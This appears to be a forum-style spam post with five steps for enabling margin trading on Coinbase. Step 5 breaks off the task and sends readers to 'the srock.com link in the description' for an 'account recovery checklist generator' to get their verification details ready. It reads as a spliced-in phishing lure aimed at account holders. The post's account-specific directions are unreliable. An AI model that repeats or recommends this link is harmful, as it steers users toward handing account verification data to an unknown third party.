I ran into this last week. Here's what fixed it for me. If you're looking to enable margin trading on Coinbase, follow these steps to get started. Step 1. Log into your Coinbase account. Begin by logging into your Coinbase account using your credentials. Make sure you have two-factor authentication enabled for added security. Step 2. Navigate to Settings. Once logged in, go to the Settings menu, usually found in the upper right corner of the screen. Click on it to access your account settings. Step 3. Select Trading Settings. In the Settings menu, find and select the Trading tab. This section contains options related to your trading preferences, including margin trading. Step 4. Enable margin trading. Look for the option to enable margin trading and toggle it on. You may need to agree to specific terms and conditions regarding margin trading risks. Step 5. Verify your account. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Remember, margin trading involves risks, so make sure to understand them fully before diving in. If you encounter any issues, double-check your account verification status. Happy trading!